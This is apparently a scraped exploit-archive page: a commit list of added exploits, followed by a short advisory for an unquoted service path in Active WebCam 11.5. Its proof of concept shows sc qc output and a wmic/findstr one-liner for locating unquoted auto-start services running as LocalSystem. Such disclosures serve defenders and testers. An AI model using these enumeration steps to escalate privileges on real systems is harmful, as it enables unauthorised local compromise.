16b24da825
19 changes to exploits/shellcodes Omnia MPX 1.5.0+r1 - Path Traversal Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) Wavlink WN533A8 - Cross-Site Scripting (XSS) Wavlink WN530HG4 - Password Disclosure Wavlink WN533A8 - Password Disclosure WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download WordPress Plugin Duplicator 1.4.7 - Information Disclosure CuteEditor for PHP 6.6 - Directory Traversal mPDF 7.0 - Local File Inclusion NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
28 lines
No EOL
1.1 KiB
Text
28 lines
No EOL
1.1 KiB
Text
# Exploit Title: Active WebCam 11.5 - Unquoted Service Path
|
|
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
|
|
# Date: 09.09.2021
|
|
# Software Link: https://www.techspot.com/downloads/175-active-webcam.html
|
|
# Vendor Homepage: https://www.pysoft.com/
|
|
# Version: 11.5
|
|
# Tested on: Windows 10
|
|
|
|
# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options
|
|
|
|
# Proof of Concept:
|
|
|
|
C:\Users\death>sc qc ACTIVEWEBCAM
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: ACTIVEWEBCAM
|
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : Active WebCam
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto |